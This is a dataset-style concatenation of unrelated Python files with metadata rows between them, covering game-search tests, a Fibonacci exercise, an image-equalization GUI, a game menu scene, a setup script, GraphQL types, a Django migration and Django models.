    # With the deterministic first-choice heuristic, one self-play game is
    # fully predictable: each row pairs a board with its one-hot policy
    # plus the final game value appended as the last element.
    start_state = TicTacToeState()
    manager = SearchManager(start_state, FirstChoiceHeuristic())
    expected_boards, expected_outputs = zip(*[
        [start_state.get_spaces(),
         np.array([1., 0., 0., 0., 0., 0., 0., 0., 0., -1.])],
        [TicTacToeState("""\
X..
...
...
""").get_spaces(), np.array([0., 1., 0., 0., 0., 0., 0., 0., 0., 1.])],
        [TicTacToeState("""\
XO.
...
...
""").get_spaces(), np.array([0., 0., 1., 0., 0., 0., 0., 0., 0., -1.])],
        [TicTacToeState("""\
XOX
...
...
""").get_spaces(), np.array([0., 0., 0., 1., 0., 0., 0., 0., 0., 1.])],
        [TicTacToeState("""\
XOX
O..
...
""").get_spaces(), np.array([0., 0., 0., 0., 1., 0., 0., 0., 0., -1.])],
        [TicTacToeState("""\
XOX
OX.
...
""").get_spaces(), np.array([0., 0., 0., 0., 0., 1., 0., 0., 0., 1.])],
        [TicTacToeState("""\
XOX
OXO
...
""").get_spaces(), np.array([0., 0., 0., 0., 0., 0., 1., 0., 0., -1.])]])
    expected_boards = np.stack(expected_boards)
    expected_outputs = np.stack(expected_outputs)
    boards, outputs = manager.create_training_data(iterations=1, data_size=7)
    assert repr(boards) == repr(expected_boards)
    assert repr(outputs) == repr(expected_outputs)
def test_win_scores_one():
    """ Expose bug where search continues after a game-ending position. """
    state1 = TicTacToeState("""\
..X
XX.
OO.
""")
    player = MctsPlayer(TicTacToeState(), state1.X_PLAYER, iteration_count=100)
    move = player.choose_move(state1)
    search_node1 = player.search_manager.current_node.parent
    for child_node in search_node1.children:
        if child_node.move == 8:
            # The winning child must be valued at exactly 1.0.
            assert child_node.average_value == 1.0
    assert move == 8
def test_choose_move_sets_current_node():
    # After each choose_move(), current_node tracks the state produced by
    # the chosen move.
    np.random.seed(0)
    start_state = Connect4State()
    state1 = Connect4State("""\
.......
.......
.......
.......
OXOXOXO
XOXOXOX
""")
    player = MctsPlayer(start_state, iteration_count=20)
    move1 = player.choose_move(state1)
    current_node1 = player.search_manager.current_node
    state2 = state1.make_move(move1)
    move2 = player.choose_move(state2)
    current_node2 = player.search_manager.current_node
    state3 = state2.make_move(move2)
    assert current_node1.game_state == state2
    assert current_node2.game_state == state3
| 24.900677 | 98 | 0.658327 | 1,304 | 0.118212 | 0 | 0 | 0 | 0 | 0 | 0 | 1,235 | 0.111957 |
e2cfc3393806f7bb4f40dc3f9cc091f1aa70db37 | 387 | py | Python | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | exercicios/ex 061 a 070/ex063.py | CarlosWillian/python | f863578245fbf402e5b46f844a247355afed0d62 | [
"MIT"
] | null | null | null | print('Sequência de Fibonacci')
print('=' * 24)
# Number of terms requested by the user.
t = int(input('Número de termos da sequência: '))
print('=' * 24)
# Build the first t Fibonacci terms, seeded with 0 and 1.
termo1, termo2 = 0, 1
termos = []
for _ in range(t):
    termos.append(termo1)
    termo1, termo2 = termo2, termo1 + termo2
# Bug fix: the old loop unconditionally printed "0, 1, " plus a trailing
# separator, producing e.g. "(0, 1, )" whenever t < 3.  Joining the term
# list handles every t (including 0, 1 and 2) with clean separators.
print('A sequência é ({})'.format(', '.join(str(termo) for termo in termos)))
| 22.764706 | 63 | 0.563307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 112 | 0.285714 |
e2cfeb3a6d764e8add262f7e0e146ac4bae2ba59 | 3,992 | py | Python | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | Histogram_Equalization/equalizer.py | CSEMN/FEE_Image_Processing | b060720fef44585a43307c9e81934a1877ddbc5f | [
"MIT"
] | null | null | null | #This code is a practice on Histogram Equalization
#Coded by: CSEMN (Mahmoud Nasser - Sec 4)
#Supervised by: Dr.Mohamed Berbar
__author__ = 'Mahmoud Nasser'
from tkinter import *
from tkinter import ttk
import cv2 as cv # if not installed please consider running : pip install opencv-python
from PIL import ImageTk,Image # if not installed please consider running : pip install Pillow
import matplotlib # if not installed please consider running : pip install matplotlib
matplotlib.use('TkAgg')
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
class AppGui:
    """Tkinter GUI comparing two histogram-equalization methods on one image."""

    def __init__(self,root:Tk) :
        # Fixed file names: the input image and where results are written.
        self.TARGET_IMG_PATH="target.jpg"
        self.RESULT_IMG_PATH="res.jpg"
        self.root=root
        self.resFrame=None
        self.configWindow(root)
        self.buildMethodSelectionFrame(root)
        self.buildOriginalImgViewr(root,self.TARGET_IMG_PATH)
    # Configure window title and size, and make the window non-resizable.
    def configWindow(self,window:Tk):
        window.title("Histogram Equalizer")
        window.geometry('800x600')
        window.resizable(0,0)
    def buildMethodSelectionFrame(self,window):
        """Build the radio-button frame that picks the equalization method."""
        self.methodSelectFrame=LabelFrame(window,text="Equalization Method")
        methodSelected=IntVar()
        methodSelected.set(0)
        ttk.Radiobutton(self.methodSelectFrame,text="OpenCV Equalizaer",variable=methodSelected,value=1,command=self.performOpenCvHistEqualizer).pack(side=LEFT)
        ttk.Radiobutton(self.methodSelectFrame,text="Clahe Equalizer",variable=methodSelected,value=2,command=self.performClahe).pack(side=RIGHT)
        self.methodSelectFrame.pack(side=TOP,pady=20)
    def performOpenCvHistEqualizer(self):
        """Equalize the target image with cv.equalizeHist and show the result."""
        img = cv.imread(self.TARGET_IMG_PATH,0)
        equalized = cv.equalizeHist(img)
        cv.imwrite(self.RESULT_IMG_PATH,equalized)
        self.buildResultlImgViewr("OpenCV Equalizer",self.root,self.RESULT_IMG_PATH)
    def performClahe(self):
        """Equalize the target image with CLAHE and show the result."""
        img = cv.imread(self.TARGET_IMG_PATH,0)
        clahe = cv.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))
        equalized = clahe.apply(img)
        cv.imwrite(self.RESULT_IMG_PATH,equalized)
        self.buildResultlImgViewr("Clahe Equalizer",self.root,self.RESULT_IMG_PATH)
    def buildOriginalImgViewr(self,window,img):
        """Show the original image and its grayscale histogram on the left."""
        frame=LabelFrame(window,text="Original Image")
        # Show the image itself; keep a reference so Tk doesn't GC the photo.
        im = Image.open(img).resize((300,200), Image.ANTIALIAS)
        self.photo = ImageTk.PhotoImage(im)
        Label(frame,image=self.photo).pack(side=TOP,pady=20)
        # Show the image histogram below it (red bars).
        cvImg = cv.imread(img,0)
        fig = Figure(figsize=(5,4), dpi=70)
        a = fig.add_subplot(111)
        a.hist(cvImg.flatten(),256,[0,256], color = 'r')
        canvas = FigureCanvasTkAgg(fig, master=frame)
        canvas.draw()
        canvas.get_tk_widget().pack(side=BOTTOM)
        frame.pack(padx=20,side=LEFT)
    def buildResultlImgViewr(self,methodName,window,img):
        """Show the equalized image and its histogram on the right."""
        # Remove any previously shown result frame first.
        if(self.resFrame != None):
            for widget in self.resFrame.winfo_children():
                widget.destroy()
            self.resFrame.pack_forget()
        # Show the result image; keep a reference to avoid GC of the photo.
        self.resFrame=LabelFrame(window,text= methodName+" Image")
        im = Image.open(img).resize((300,200), Image.ANTIALIAS)
        self.resPhoto = ImageTk.PhotoImage(im)
        Label(self.resFrame,image=self.resPhoto).pack(side=TOP,pady=20)
        # Show the histogram of the result image (blue bars).
        cvImg = cv.imread(img,0)
        fig = Figure(figsize=(5,4), dpi=70)
        a = fig.add_subplot(111)
        a.hist(cvImg.flatten(),256,[0,256], color = 'b')
        canvas = FigureCanvasTkAgg(fig, master=self.resFrame)
        canvas.draw()
        canvas.get_tk_widget().pack(side=BOTTOM)
        self.resFrame.pack(padx=20,side=RIGHT)
if __name__ == '__main__':
    # Build the Tk root window, attach the app, and enter the event loop.
    root=Tk()
    AppGui(root)
    root.mainloop()
| 38.384615 | 160 | 0.677605 | 3,312 | 0.829659 | 0 | 0 | 0 | 0 | 0 | 0 | 714 | 0.178858 |
e2d0618f948725a9592d18db6089a0036d0d5efa | 3,336 | py | Python | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 1 | 2019-07-17T23:26:10.000Z | 2019-07-17T23:26:10.000Z | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 8 | 2019-06-04T15:26:37.000Z | 2019-07-17T23:30:35.000Z | divineoasis/scenes/main_menu_manager.py | wsngamerz/Divine-Oasis-RPG | a554431f6eee65ee109d9c1d7f67c12eaba8c974 | [
"MIT"
] | 1 | 2019-06-04T15:17:45.000Z | 2019-06-04T15:17:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: scenes/main_menu_manager.py
# -------------------
# Divine Oasis
# Text Based RPG Game
# By wsngamerz
# -------------------
import logging
import random
from divineoasis.assets import Assets
from divineoasis.audio_manager import AudioManager
from divineoasis.scene import Scene
from divineoasis.scenes.main_menu.menu_scene import MenuScene
from divineoasis.scenes.main_menu.options_scene import OptionsScene
from pyglet.graphics import Batch, OrderedGroup
from pyglet.sprite import Sprite
from pyglet.window import Window, FPSDisplay
class MainMenu(Scene):
    """Main-menu scene: manages sub-scenes, menu music and scrolling background."""

    def __init__(self, assets: Assets, window: Window, audio_manager: AudioManager):
        Scene.__init__(self, assets, window, audio_manager)
        self.logger = logging.getLogger(__name__)
        self.current_scene = None
        self.sub_scenes = {}
        self.add_sub_scene(MenuScene(self.assets, self.window, self.audio_manager))
        self.add_sub_scene(OptionsScene(self.assets, self.window, self.audio_manager))
        self.fps_display = FPSDisplay(self.window)
        self.fps_display.label.y = 680
        self.fps_display.label.color = (255, 255, 255, 255)
        # Background sprite & image (loaded lazily in load_background()).
        self.background_image = None
        self.background_sprite = None
        # Current scroll offset of the moving background.
        self.bg_pos = [0, 0]
    def start_scene(self):
        """Load music, show the menu sub-scene, then start background and audio."""
        self.load_audio()
        self.switch_sub_scene("MenuScene")
        self.load_background()
        self.play_audio()
    def add_sub_scene(self, scene: Scene):
        """Register *scene* under its class name and wire up scene switching."""
        sub_scene_name = scene.__class__.__name__
        scene.switch_sub_scene = self.switch_sub_scene
        self.sub_scenes[sub_scene_name] = scene
    def load_audio(self):
        """Queue the menu songs in a shuffled, looping playlist."""
        songs = [
            "menu.ove_melaa_italo_unlimited",
            "menu.ove_melaa_super_ninja_assasin",
            "menu.ove_melaa_power_of_thy_yes"
        ]
        random.shuffle(songs)
        self.logger.debug(f"Loading menu songs: { songs }")
        self.audio_manager.load_songs(songs, loop=True)
    def play_audio(self):
        """Start playback of the queued songs."""
        self.audio_manager.play_songs()
    def load_background(self):
        """Load the background image asset and create its sprite."""
        self.background_image = self.assets.get_pyglet_image("user_interface.background")
        self.initiate_background()
    def initiate_background(self):
        """(Re)create the background sprite in the current scene's batch."""
        if not self.background_image:
            self.load_background()
        self.background_sprite = Sprite(self.background_image, x=0, y=0,
                                        batch=self.current_scene.batch, group=self.current_scene.background)
    def switch_sub_scene(self, sub_scene_name: str):
        """Swap window handlers to the named sub-scene and start it."""
        if sub_scene_name in self.sub_scenes:
            self.window.remove_handlers(self.current_scene)
            self.current_scene = self.sub_scenes[sub_scene_name]
            self.window.push_handlers(self.current_scene)
            self.initiate_background()
            self.current_scene.start_scene()
    def update(self, dt: float):
        """Scroll the background, update the active sub-scene, and draw FPS."""
        self.bg_pos[0] -= 2
        self.bg_pos[1] -= 1
        # Wrap the scroll once it has moved a full image-width to the left.
        if self.bg_pos[0] <= -4800:
            self.bg_pos = [0, 0]
        self.background_sprite.update(self.bg_pos[0], self.bg_pos[1])
        self.current_scene.update(dt)
        self.fps_display.draw()
| 31.17757 | 89 | 0.666067 | 2,734 | 0.819544 | 0 | 0 | 0 | 0 | 0 | 0 | 469 | 0.140588 |
e2d0873043c167f2f68be47cd5ad16d9ad3d23a9 | 469 | py | Python | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | myadsp/emails.py | kelockhart/myADSPipeline | 21c453a6d7c35d7ce019a71854010fb80b1bc56f | [
"MIT"
] | null | null | null | """email templates"""
from builtins import object
class Email(object):
    """Container for the pieces of one outgoing email message."""
    # Subject line.
    subject = u''
    # Plain-text body.
    msg_plain = ''
    # HTML body.
    msg_html = ''
    # Salt string (use not shown in this module).
    salt = ''
class myADSTemplate(Email):
    """Template for myADS personal-notification emails."""
    subject = u'myADS Notification'
    # Plain-text body; ``{payload}`` is substituted with the results text.
    msg_plain = """
SAO/NASA ADS: myADS Personal Notification Service Results
{payload}
"""
    # HTML body is the raw payload with no wrapper.
    msg_html = """{payload}"""
| 18.038462 | 65 | 0.575693 | 414 | 0.882729 | 0 | 0 | 0 | 0 | 0 | 0 | 269 | 0.573561 |
e2d0f35a2efdab82ab362a625cfe59a0e847406a | 1,914 | py | Python | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | 1 | 2015-05-13T10:52:22.000Z | 2015-05-13T10:52:22.000Z | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | null | null | null | getAddrFromOS.py | OpenAddressesUK/OSSpatialResearch | a0156278f35330088c6e8f89cbf32601444872d3 | [
"MIT"
] | null | null | null | #
# Open addresses Spatial Research
# Display Candidate Address Components From OS Open Map & Open Roads
#
#
# Version 1.0 (Python) in progress
# Author John Murray
# Licence MIT
#
# Purpose Display Candidate Address Components
#
import MySQLdb
import collections
import sys
# Database configuration
username = "****"
password = "********"
hostname = "********"
database = "****"
if len(sys.argv) != 3:
print "Invalid arguments. Usage is 'python getAddrFromOS.py postcode buffer'"
sys.exit()
else:
postcode = sys.argv[1]
buf_size = int(sys.argv[2])
dbConn = MySQLdb.connect(host=hostname,user=username,passwd=password,db=database)
cur = dbConn.cursor()
query = "SELECT `name1`,`formOfWay`,`length`,`formsPart`,ST_DISTANCE(`GEOMETRY`,(SELECT `GEOMETRY`FROM `gaz_opennames` WHERE `OS_ID` = '"+postcode+"')) AS `Distance` FROM `spa_roadlink` WHERE `ID` IN (SELECT `ID` FROM `spa_roadlink` WHERE ST_INTERSECTS(`GEOMETRY`,(SELECT ST_BUFFER(`GEOMETRY`,"+str(buf_size)+") FROM `gaz_opennames` WHERE `OS_ID` = '"+postcode+"'))) ORDER BY `Distance`"
cur.execute(query)
data = cur.fetchall()
streets = []
print "Postcode: "+postcode[0:-3]+" "+postcode[-3:]
print
for d in data:
if d[3] != '':
for s in d[3].split(","):
query = "SELECT `NAME1`, `TYPE`, `LOCAL_TYPE`, `POSTCODE_DISTRICT`, `POPULATED_PLACE`, `DISTRICT_BOROUGH`, `COUNTY_UNITARY`, `REGION`, `COUNTRY`, `RELATED_SPATIAL_OBJECT` FROM `gaz_opennames` WHERE `OS_ID` = '"+s+"'"
cur.execute(query)
for d1 in cur.fetchall():
if d1[0] not in streets:
print "Street: "+d1[0]
print "Settlement: "+d1[4]
print "District: "+d1[5]
print "County: "+d1[6]
print "Distance: "+str(d[4])
print
streets.extend([d1[0]])
| 33 | 387 | 0.603448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 999 | 0.521944 |
e2d1181ba43764099ea9ef3959a87a0948ac70c3 | 2,645 | py | Python | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | 1 | 2015-01-14T22:08:27.000Z | 2015-01-14T22:08:27.000Z | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | 103 | 2015-01-08T13:45:38.000Z | 2022-01-13T00:38:39.000Z | ext/app/decorators.py | FNLF/fnlf-backend | 060d675d7cf8d0eff46af6eb4be7035b8cd68d36 | [
"MIT"
] | null | null | null | """
Custom decorators
=================
Custom decorators for various tasks and to bridge Flask with Eve
"""
from flask import current_app as app, request, Response, abort
from functools import wraps
from ext.auth.tokenauth import TokenAuth
from ext.auth.helpers import Helpers
# Because of circular import in context
from ext.app.eve_helper import eve_abort
class AuthenticationFailed(Exception):
    """Raised when a request's token fails the authentication checks."""
class AuthenticationNoToken(Exception):
    """Raised when a request carries no authentication token at all."""
def require_token(allowed_roles=None):
    """Decorator enforcing Eve-style token authentication on a Flask view.

    Bridges Flask views to the custom TokenAuth class used by Eve:
    the token is read from the basic-auth username field, checked against
    the request method, resource path and *allowed_roles*, and the view
    runs only when the check succeeds.  Failures abort with 401; any other
    error aborts with 500.
    """
    def decorator(f):
        @wraps(f)
        def wrapped(*args, **kwargs):
            try:
                # The token travels as the basic-auth "username"; a request
                # with no Authorization header raises here (request.authorization
                # is None) and is converted to AuthenticationFailed.
                try:
                    authorization_token = request.authorization.get('username', None)
                except Exception as e:
                    raise AuthenticationFailed
                # Do the authentication.  The resource is request.path with
                # the app prefix plus the leading '/' stripped off.
                auth = TokenAuth()
                auth_result = auth.check_auth(token=authorization_token,  # Token
                                              method=request.method,
                                              resource=request.path[len(app.globals.get('prefix')) + 1:],
                                              allowed_roles=allowed_roles)
                if auth_result is not True:
                    raise AuthenticationFailed
            # Map failures to HTTP aborts: 401 for auth, 500 for anything else.
            except AuthenticationFailed:
                eve_abort(401, 'Please provide proper credentials')
            except Exception as e:
                eve_abort(500, 'Server error')
            return f(*args, **kwargs)
        return wrapped
    return decorator
def require_superadmin():
    """Decorator allowing only users listed by Helpers.get_superadmins().

    The current user id is read from app.globals['user_id']; anyone not in
    the superadmin list is aborted with 401.
    @TODO: use a switch for ref [superadmin, admin,..]?
    @TODO: in ext.auth.helpers define a get_users_in_roles_by_ref(ref)?
    """
    def decorator(f):
        @wraps(f)
        def wrapped(*args, **kwargs):
            h = Helpers()
            if int(app.globals['user_id']) not in h.get_superadmins():  # [99999]: # # #
                eve_abort(401, 'You do not have sufficient privileges')
            return f(*args, **kwargs)
        return wrapped
    return decorator
| 30.402299 | 105 | 0.579206 | 135 | 0.05104 | 0 | 0 | 1,524 | 0.576181 | 0 | 0 | 921 | 0.348204 |
e2d1c534677315f6466e246bf5f311b6dc6c8b9a | 3,978 | py | Python | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 1 | 2020-04-20T05:37:09.000Z | 2020-04-20T05:37:09.000Z | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | 23 | 2019-03-13T10:54:36.000Z | 2022-03-11T23:33:59.000Z | home/migrations/0046_auto_20190905_0939.py | davidjrichardson/toucans | 7446b78ec2a09ff90eb83d4a78638c909deb06e1 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.5 on 2019-09-05 09:39
from django.db import migrations, models
class Migration(migrations.Migration):
    """Shorten the verbose names on every League badge round score field."""

    dependencies = [
        ('home', '0045_auto_20190409_1450'),
    ]

    # Every score column on leaguebadgeroundentry becomes an IntegerField
    # whose verbose name is "<label> <Colour>" (bb->BB, cb->CP, lb->LB,
    # rc->RC over the five colours).  Generating the twenty AlterField
    # operations keeps the list and the naming rule in one place; the
    # nested-loop order matches the original literal list exactly.
    operations = [
        migrations.AlterField(
            model_name='leaguebadgeroundentry',
            name='{}_{}_score'.format(prefix, colour),
            field=models.IntegerField(
                verbose_name='{} {}'.format(label, colour.capitalize())),
        )
        for prefix, label in [('bb', 'BB'), ('cb', 'CP'),
                              ('lb', 'LB'), ('rc', 'RC')]
        for colour in ['black', 'blue', 'gold', 'red', 'white']
    ]
| 34.894737 | 63 | 0.587733 | 3,885 | 0.976621 | 0 | 0 | 0 | 0 | 0 | 0 | 1,026 | 0.257919 |
e2d285ee4ae38f832b4b1c001f7a02e948846796 | 2,017 | py | Python | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | setup.py | mzinin/s2e2.python | 1d7776be32a34c37174bbb4257ff99f4c340b7ac | [
"MIT"
] | null | null | null | #!/bin/sh
# it's a kind of magic to run python with -B key
# https://stackoverflow.com/questions/17458528/why-does-this-snippet-with-a-shebang-bin-sh-and-exec-python-inside-4-single-q
''''exec python3 -B -- "$0" ${1+"$@"} # '''
import os
import re
import setuptools
import setuptools.command.test
import sys
# Directory containing this setup.py; package files are resolved against it.
base_path = os.path.dirname(__file__)

# Read the package version straight out of src/s2e2/__init__.py so it is
# defined in exactly one place.  Files are decoded as UTF-8 explicitly:
# relying on the locale's default encoding can break installs on systems
# configured with a non-UTF-8 locale.
with open(os.path.join(base_path, 'src', 's2e2', '__init__.py'), encoding='utf-8') as f:
    version = re.compile(r""".*__version__ = ["'](.*?)['"]""", re.S).match(f.read()).group(1)

# Long description shown on PyPI.
with open(os.path.join(base_path, 'README.rst'), encoding='utf-8') as f:
    readme = f.read()
class PyTest(setuptools.command.test.test):
    """``python setup.py test`` command that delegates to pytest."""

    def initialize_options(self):
        """Keep the stock test-command options unchanged."""
        setuptools.command.test.test.initialize_options(self)

    def run_tests(self):
        """Run the suite with pytest and exit with its status code."""
        import pytest
        pytest_args = ['-v', '-p', 'no:cacheprovider']
        sys.exit(pytest.main(pytest_args))
# Package metadata and build configuration for the s2e2 distribution.
setuptools.setup(
    name='s2e2',
    version=version,
    description='Simple String Expression Evaluator library',
    long_description=readme,
    keywords='expression-evaluator string-expression',
    author='Mikhail Zinin',
    author_email='mzinin@gmail.com',
    url='https://github.com/mzinin/s2e2.python',
    license='MIT',
    packages=['s2e2', 's2e2.functions', 's2e2.operators' ],
    package_data={'': ['README.rst']},
    # Sources live under src/ (the "src layout").
    package_dir={'': 'src'},
    python_requires='>=3.4',
    tests_require=['pytest', 'mock'],
    test_suite='test',
    # Route "python setup.py test" through the PyTest command above.
    cmdclass = {'test': PyTest},
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        "Topic :: Software Development :: Libraries",
    ],
)
| 30.104478 | 124 | 0.630144 | 273 | 0.13535 | 0 | 0 | 0 | 0 | 0 | 0 | 1,000 | 0.495786 |
e2d2993a71706a9f1b56afda9081361dce12073d | 4,613 | py | Python | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | graphene_mongoengine/types.py | ramarivera/graphene-mongoengine | 1020674233993bba98454b1850f184f7b79a614e | [
"MIT"
] | null | null | null | from collections import OrderedDict
from graphene import Field # , annotate, ResolveInfo
from graphene.relay import Connection, Node
from graphene.types.objecttype import ObjectType, ObjectTypeOptions
from graphene.types.utils import yank_fields_from_attrs
from mongoengine import DoesNotExist
from .converter import convert_mongoengine_field
from .registry import Registry, get_global_registry
from .utils import get_document_fields, is_mongoengine_document, get_query
# pylint: disable=W0622,C0103
def construct_fields(document, registry, only_fields, exclude_fields):
fields = OrderedDict()
document_fields = get_document_fields(document)
for name, field in document_fields.items():
is_not_in_only = only_fields and name not in only_fields
is_excluded = name in exclude_fields
if is_not_in_only or is_excluded:
continue
converted_field = convert_mongoengine_field(field, registry)
print(name)
fields[name] = converted_field
# # Get all the columns for the relationships on the model
# for relationship in inspected_model.relationships:
# is_not_in_only = only_fields and relationship.key not in only_fields
# # is_already_created = relationship.key in options.fields
# is_excluded = relationship.key in exclude_fields # or is_already_created
# if is_not_in_only or is_excluded:
# # We skip this field if we specify only_fields and is not
# # in there. Or when we exclude this field in exclude_fields
# continue
# converted_relationship = convert_sqlalchemy_relationship(relationship, registry)
# name = relationship.key
# fields[name] = converted_relationship
return fields
class MongoEngineObjectTypeOptions(ObjectTypeOptions):
    """Meta options carried by each MongoEngineObjectType subclass."""
    document = None  # type: Document
    registry = None  # type: Registry
    connection = None  # type: Type[Connection]
    id = None  # type: str
class MongoEngineObjectType(ObjectType):
    """Graphene ObjectType whose fields are derived from a MongoEngine Document.

    Subclasses declare the document (and options) via their Meta; field
    conversion, registry bookkeeping and optional Relay connection creation
    all happen in ``__init_subclass_with_meta__``.
    """
    @classmethod
    def __init_subclass_with_meta__(cls, document=None, registry=None, skip_registry=False,
                                    only_fields=(), exclude_fields=(), connection=None,
                                    use_connection=None, interfaces=(), id=None, **options):
        # A valid MongoEngine Document is mandatory.
        assert is_mongoengine_document(document), (
            f"You need to pass a valid MongoEngine Document in {cls.__name__}.Meta, "
            f"received '{document}'."
        )
        if not registry:
            registry = get_global_registry()
        assert isinstance(registry, Registry), (
            f'The attribute registry in {cls.__name__} needs to be an instance of '
            f'Registry, received "{registry}".'
        )
        # Convert the document's fields into graphene Fields on this type.
        mongoengine_fields = yank_fields_from_attrs(
            construct_fields(document, registry, only_fields, exclude_fields),
            _as=Field,
        )
        # A Node interface implies a Relay connection unless told otherwise.
        if use_connection is None and interfaces:
            use_connection = any((issubclass(interface, Node) for interface in interfaces))
        if use_connection and not connection:
            # We create the connection automatically
            connection = Connection.create_type(f'{cls.__name__}Connection', node=cls)
        if connection is not None:
            assert issubclass(connection, Connection), (
                f'The connection must be a Connection. Received {connection.__name__}'
            )
        # Record everything on the options object graphene attaches as _meta.
        _meta = MongoEngineObjectTypeOptions(cls)
        _meta.document = document
        _meta.registry = registry
        _meta.fields = mongoengine_fields
        _meta.connection = connection
        _meta.id = id or 'id'
        super(MongoEngineObjectType, cls).__init_subclass_with_meta__(
            _meta=_meta,
            interfaces=interfaces,
            **options
        )
        if not skip_registry:
            registry.register(cls)
    @classmethod
    def is_type_of(cls, root, info):
        """True when *root* is this type's document (or already an instance)."""
        if isinstance(root, cls):
            return True
        if not is_mongoengine_document(root):
            raise Exception(f'Received incompatible instance "{root}".')
        return isinstance(root, cls._meta.document)
    @classmethod
    def get_query(cls, info):
        """ Gets QuerySet for this type's document """
        document = cls._meta.document
        return get_query(document, info.context)
    @classmethod
    def get_node(cls, info, id):
        """ Returns document to wrap in Node """
        try:
            return cls.get_query(info).get(id)
        except DoesNotExist:
            # Missing documents resolve to a null node rather than an error.
            return None
e2d58ed4d184954f58d06c57f5681f8b2aa9469e | 1,936 | py | Python | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | apps/test/models.py | catveloper/dynamic_form_generator | be2704cff5ee0f93461cf6c82e47dc1a39b9a98e | [
"MIT"
] | null | null | null | from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
class Workspace(models.Model):
    """Top-level container that owns annotation projects."""
    # Immutable machine identifier; not editable in admin forms.
    code = models.CharField(_('코드'), max_length=40, unique=True, editable=False)
    # Human-readable unique display name.
    name = models.CharField(_('이름'), max_length=50, unique=True)
    # Owning user; PROTECT blocks deleting a user that still owns workspaces.
    owner = models.ForeignKey(
        settings.AUTH_USER_MODEL, related_name='workspaces_owned',
        on_delete=models.PROTECT, verbose_name=_('소유자')
    )
    # New workspaces start inactive and must be activated explicitly.
    is_active = models.BooleanField(_('활성'), default=False)
    class Meta:
        verbose_name = _('워크스페이스')
        verbose_name_plural = _('워크스페이스')
    def __str__(self):
        return self.name
class Project(models.Model):
    """An annotation project that lives inside a Workspace."""
    # Parent workspace; PROTECT blocks deleting a workspace with projects.
    workspace = models.ForeignKey(
        'Workspace', related_name='projects',
        on_delete=models.PROTECT, verbose_name=_('워크스페이스')
    )
    title = models.CharField(_('제목'), max_length=200)
    # Closed set of annotation categories (image / video / point cloud).
    category = models.CharField(
        _('카테고리'), max_length=50,
        choices=[
            ('image_annotation', _('이미지 어노테이션')),
            ('video_annotation', _('비디오 어노테이션')),
            ('pcd_annotation', _('PCD 어노테이션'))
        ]
    )
    class Meta:
        verbose_name = _('프로젝트')
        verbose_name_plural = _('프로젝트')
    def __str__(self):
        return self.title
class Task(models.Model):
    """A unit of work within a Project."""
    class Meta:
        verbose_name = '테스크'
    # Parent project; CASCADE removes tasks when the project is deleted.
    project = models.ForeignKey(
        'Project', related_name='tasks',
        on_delete=models.CASCADE, verbose_name='프로젝트'
    )
    name = models.CharField(max_length=30)
class Annotation(models.Model):
    """A single user's annotation result for a Task."""
    # Annotations are deleted together with their task or user (CASCADE).
    task = models.ForeignKey(
        'Task', related_name='annotations',
        on_delete=models.CASCADE
    )
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL, related_name='annotations',
        on_delete=models.CASCADE
    )
    # Free-form annotation payload; defaults to an empty dict.
